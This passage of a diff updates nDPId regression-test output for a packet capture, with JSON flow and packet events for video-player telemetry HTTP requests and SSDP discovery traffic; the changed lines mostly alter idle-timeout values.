eWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xX
zYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} +01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7560000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353180052&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1134,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1467353180443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353180443,"pkt":"ABxCjnAxTF4M6gNlCABFAAC501VAADMGZuDKbA7swKhzCABQxUZksP7LoYaTxFAYACF90QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjE5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1467353180830,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353180830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUgAAAQRyyvAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1135,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180830,"flow_last_seen":1467353180830,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353180830,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":52529,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1467353181295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1467353181295,"pkt":"TF4M6gNlKDc3Alz6CABFAAE99F1AAEAGPTfAqAUPROn9hf5oAFDPYUlYxJOK\/oAYEBX74gAAAQEICiYb7H8rI43TR0VUIC9jb21NYWdpY2FuQXBpL2NvbXBvc2l0ZS9hcHAucGhwL0dsb2JhbC9JbmRleC9pcCBIVFRQLzEuMQ0KSG9zdDogYXBpLm1hZ2ljYW5zb2Z0LmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtdHcNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KVXNlci1BZ2VudDogTWFnaWNhbiAodW5rbm93biB2ZXJzaW9uKSBDRk5ldHdvcmsvNzIwLjUuNyBEYXJ3aW4vMTQuNS4wICh4ODZfNjQpDQoNCg=="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} 
-00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1467353181515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353181515,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4BFJAADUGOAhE6f2FwKgFDwBQ\/mjEk4r+z2FKYYAYABs0tgAAAQEICisjjrEmG+x\/SFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6NDcgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1467353181295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1467353181295,"pkt":"TF4M6gNlKDc3Alz6CABFAAE99F1AAEAGPTfAqAUPROn9hf5oAFDPYUlYxJOK\/oAYEBX74gAAAQEICiYb7H8rI43TR0VUIC9jb21NYWdpY2FuQXBpL2NvbXBvc2l0ZS9hcHAucGhwL0dsb2JhbC9JbmRleC9pcCBIVFRQLzEuMQ0KSG9zdDogYXBpLm1hZ2ljYW5zb2Z0LmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtdHcNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KVXNlci1BZ2VudDogTWFnaWNhbiAodW5rbm93biB2ZXJzaW9uKSBDRk5ldHdvcmsvNzIwLjUuNyBEYXJ3aW4vMTQuNS4wICh4ODZfNjQpDQoNCg=="} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1136,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353181295,"flow_last_seen":1467353181295,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1467353181295,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} 
+00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1467353181515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353181515,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4BFJAADUGOAhE6f2FwKgFDwBQ\/mjEk4r+z2FKYYAYABs0tgAAAQEICisjjrEmG+x\/SFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6NDcgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1467353182046,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353182046,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6IAAAER3+HAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1467353183830,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353183830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUkAAAQRyyrAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1467353185047,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353185047,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6MAAAER3+DAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1467353185940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353185940,"pkt":"TF4M6gNlABxCjnAxCABFAAKdKslAAIAGwJnAqHMIymwO28VHAFCsEt6EcxJBblAYAQR7YQAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0zMCZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxODUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=30&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353185&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1467353186002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353186002,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5ehdAADMGwC\/KbA7bwKhzCABQxUdzEkFurBLg+VAYADiXAQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7560000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1467353185940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353185940,"pkt":"TF4M6gNlABxCjnAxCABFAAKdKslAAIAGwJnAqHMIymwO28VHAFCsEt6EcxJBblAYAQR7YQAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0zMCZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxODUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1141,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353185940,"flow_last_seen":1467353185940,"flow_idle_time":7560000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353185940,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=30&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353185&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1467353186002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353186002,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5ehdAADMGwC\/KbA7bwKhzCABQxUdzEkFurBLg+VAYADiXAQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"pps.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1467353186830,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353186830,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClNUoAAAQRyynAqAUy7\/\/\/+s0xB2wAkYI7TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 